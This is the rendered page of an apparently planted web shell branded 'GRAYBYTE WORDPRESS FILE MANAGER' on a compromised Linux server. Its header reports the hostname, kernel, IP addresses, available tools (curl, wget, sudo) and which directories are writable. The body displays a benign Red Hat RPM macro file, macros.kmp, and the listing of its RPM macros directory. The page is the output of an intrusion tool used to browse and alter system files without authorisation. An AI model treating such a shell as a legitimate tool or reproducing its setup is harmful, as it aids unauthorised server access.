✘✘ GRAYBYTE WORDPRESS FILE MANAGER ✘✘

​🇳​​🇦​​🇲​​🇪♯➤ server.blackpussy.asia ​🇻​♯➤ 5.14.0-611.20.1.el9_7.x86_64 #1 SMP 🇾​♯➤ 2026

𝗛𝗢𝗠𝗘 𝗜𝗗 ♯➤ 163.245.207.76 ♯➤ 𝗔𝗗𝗠𝗜𝗡 𝗜𝗗 216.73.216.243
𝗢𝗣𝗧𝗜𝗢𝗡𝗦 ♯ CRL ♯➤ 𝗢𝗞 ┃ WGT ♯➤ 𝗢𝗞 ┃ SDO ♯➤ 𝗢𝗞 ┃ PKEX ♯➤ 𝗢𝗙𝗙
𝗗𝗘𝗔𝗖𝗧𝗜𝗩𝗔𝗧𝗘𝗗 ♯➤ mail,mb_send_mail
𝗖𝗨𝗥𝗥𝗘𝗡𝗧 𝗙𝗜𝗟𝗘 : /usr/lib/rpm/macros.d//macros.kmp
# Use these macros to differentiate between RH and other KMP implementation(s).
redhat_kernel_module_package	1
kernel_module_package_release	1

redhat_kmp_has_post_hooks	1

%__brp_kmod_set_exec_bit  /usr/lib/rpm/redhat/brp-kmod-set-exec-bit
%__brp_kmod_restore_perms /usr/lib/rpm/redhat/brp-kmod-restore-perms

%__kmod_brps_added 0

#kernel_module_package [ -n name ] [ -v version ] [ -r release ] [ -s script ]
#                      [ -f filelist] [ -x ] [ -p preamble ] flavor flavor ...

%kernel_module_package_buildreqs	%global kmodtool_generate_buildreqs 1 \
					kernel-devel kernel-abi-stablelists redhat-rpm-config kernel-rpm-macros elfutils-libelf-devel kmod

%kernel_module_package(n:v:r:s:f:xp:) %{expand:%( \
	## An ugly hack: we want kmods to be processed by find-debuginfo,
	## but it processes only files with executable permission set.
	## It is important now since, as of now, if debuginfo package
	## is enabled (and it is enabled), there's an RPM build error
	## as a result of lack of ether absence or emptiness of
	## debugsourcefiles.list (which is likely a bug in RPM, but it looks
	## like that there's no obvious fix and apparently no one have
	## any issues with this).
	## In order to minimise intrusiveness, usually (in Red Hat-built kmod
	## RPMs) *.ko files just have executable permission being set as a part
	## of %build section. There are two caveats with kmp, however:
	##  * We have no control over %build section itself (and it wasn't
	##    required previously)
	##  * Changing the criteria used in find-debuginfo.sh/brp-strip
	##    for selecting files that have to undergo debug section separation
	##    may introduce regression.
	## As a result, we insert additional hooks in __spec_install_post
	## (__brp_kmod_set_exec_bit in the beginning and
	## __brp_kmod_restore_perms in the end) that (temporarily) set
	## executable permission for *.ko files so find-debuginfo.sh will pick
	## them up.
	## Unfortunately, __spec_install_post's body is copied here since
	## we want that __debug_package macro expansion has been performed
	## lazily and  it looks like RPM has no ability to provide a body
	## of a macro verbatim.
	if [ 0 = "%{__kmod_brps_added}" ]; then \
		echo "%%global __spec_install_post \\\\" \
		echo "	%%{?__brp_kmod_set_exec_bit} \\\\" \
		echo "	%%%%{?__debug_package:%%%%{__debug_install_post}} \\\\" \
		echo "	%%{__arch_install_post} \\\\" \
		echo "	%%{__os_install_post} \\\\" \
		echo "	%%{?__brp_kmod_pre_sign_process} \\\\" \
		echo "	%%{?__brp_kmod_sign} \\\\" \
		echo "	%%{?__brp_kmod_post_sign_process} \\\\" \
		echo "	%%{?__brp_kmod_compress} \\\\" \
		echo "	%%{?__brp_kmod_post_compress_process} \\\\" \
		echo "	%%{?__brp_kmod_restore_perms} \\\\" \
		echo "%%{nil}" \
	fi \
	%global __kmod_brps_added 1 \
	%global kmodtool %{-s*}%{!-s:/usr/lib/rpm/redhat/kmodtool} \
	%global kmod_version %{-v*}%{!-v:%{version}} \
	%global kmod_release %{-r*}%{!-r:%{release}} \
	%global latest_kernel %({ rpm -q --qf '%%{VERSION}-%%{RELEASE}.%%{ARCH}\\\\n' kernel-rt-devel kernel-aarch64-devel kernel-devel | grep -v 'is not installed' | /usr/lib/rpm/redhat/rpmsort -r | head -n 1; echo '%%%%{nil}'; } | head -n 1) \
	%{!?kernel_version:%{expand:%%global kernel_version %{latest_kernel}}} \
	%global kverrel %(%{kmodtool} verrel %{?kernel_version} 2>/dev/null) \
	flavors="default" \
	if [ -z "%*" ]; then \
		flavors_to_build=$flavors \
	elif [ -z "%{-x}" ]; then \
		flavors_to_build="%*" \
	else \
		flavors_to_build=" $flavors "\
		for i in %* \
		do \
			flavors_to_build=${flavors_to_build//$i /}
		done \
	fi \
	echo "%%global flavors_to_build ${flavors_to_build:-%%nil}" \
	echo "%%global kernel_source() \\\$([ default = \"%%%%{1}\" ] && echo \"/usr/src/kernels//%%%%kverrel\" || %{kmodtool} kernel_source \"%%%%{kverrel}\" \"%%%%{1}\" 2>/dev/null || { ls -Ud \"/usr/src/kernels///%%%%{kverrel}\"[.+]\"%%%%{1}\" | sort -V | tail -n 1; } || echo \"/usr/src/kernels////%%%%kverrel.%%%%1\")" \
	echo "%%global kernel_module_package_moddir() extra" \
	if [ ! -z "%{-f*}" ] \
	then \
		filelist="%{-f*}" \
	fi \
	if [ ! -z "%{-p*}" ] \
	then \
		preamble="%{-p*}" \
	fi \
	nobuildreqs="yes" \
	if [ "x%{kmodtool_generate_buildreqs}" != "x1" ] \
	then \
		nobuildreqs="no" \
	fi \
	override_filelist="$filelist" override_preamble="$preamble" nobuildreqs="$nobuildreqs" kmod_version=%kmod_version kmod_release=%kmod_release %{kmodtool} rpmtemplate %{-n*}%{!-n:%name} %{kverrel} $flavors_to_build 2>/dev/null \
)}

Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]

Current_dir [ 𝗡𝗢𝗧 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ] Document_root [ 𝗪𝗥𝗜𝗧𝗘𝗔𝗕𝗟𝗘 ]


[ Back ]
𝗡𝗔𝗠𝗘
𝗦𝗜𝗭𝗘
𝗟𝗔𝗦𝗧 𝗧𝗢𝗨𝗖𝗛
𝗨𝗦𝗘𝗥
𝗦𝗧𝗔𝗧𝗨𝗦
𝗙𝗨𝗡𝗖𝗧𝗜𝗢𝗡𝗦
..
--
26 Jun 2026 4.57 AM
root / root
0755
macros.aaa-pyproject-srpm
0.852 KB
4 Apr 2026 9.17 PM
root / root
0644
macros.dist
0.409 KB
19 May 2026 7.33 AM
root / root
0644
macros.dwz
1.764 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.efi-srpm
3.193 KB
17 Sep 2025 7.08 AM
root / root
0644
macros.environment-modules
0.073 KB
14 May 2023 5.11 PM
root / root
0644
macros.fedora-misc
2.424 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.fedora-misc-srpm
1.678 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.firewalld
0.233 KB
4 Aug 2026 8.19 PM
root / root
0644
macros.fonts-srpm
5.167 KB
12 Feb 2022 3.59 AM
root / root
0644
macros.forge
3.248 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.ghc-srpm
0.522 KB
30 Jan 2022 3.59 PM
root / root
0644
macros.go-srpm
9.814 KB
31 Mar 2026 6.33 PM
root / root
0644
macros.java-srpm
0.092 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.kernel-srpm
0.106 KB
17 Sep 2025 7.20 AM
root / root
0644
macros.kmp
4.375 KB
17 Sep 2025 7.11 AM
root / root
0644
macros.ldc-srpm
0.068 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.ldconfig
0.3 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.lua-srpm
0.276 KB
11 Feb 2022 10.12 PM
root / root
0644
macros.mono-srpm
0.177 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.nodejs-srpm
0.316 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.ocaml-srpm
0.728 KB
16 Feb 2022 10.20 AM
root / root
0644
macros.openblas-srpm
0.102 KB
10 Feb 2022 6.48 PM
root / root
0644
macros.perl
5.511 KB
28 Jul 2025 3.48 AM
root / root
0644
macros.perl-srpm
0.842 KB
25 Mar 2022 12.27 PM
root / root
0644
macros.pkgconf
0.06 KB
6 Apr 2023 8.27 PM
root / root
0644
macros.python-srpm
11.134 KB
1 Oct 2024 12.46 PM
root / root
0644
macros.qt5-srpm
0.48 KB
27 Sep 2023 1.05 AM
root / root
0644
macros.rust-srpm
1.345 KB
11 Feb 2022 11.32 AM
root / root
0644
macros.selinux-policy
7.077 KB
4 Apr 2026 9.23 PM
root / root
0644
macros.systemd
6.924 KB
25 Jun 2026 12.24 AM
root / root
0644
macros.systemtap
0.201 KB
4 Apr 2026 9.42 PM
root / root
0644
macros.sysusers
0.335 KB
25 Jun 2026 12.26 AM
root / root
0644
macros.valgrind-srpm
0.124 KB
17 Sep 2025 7.15 AM
root / root
0644
macros.vim
0.039 KB
10 Sep 2026 5.16 PM
root / root
0644
macros.vpath
0.235 KB
17 Sep 2025 7.15 AM
root / root
0644

✘✘ GRAYBYTE WORDPRESS FILE MANAGER @ 2026 CONTACT ME ✘✘
Static GIF Static GIF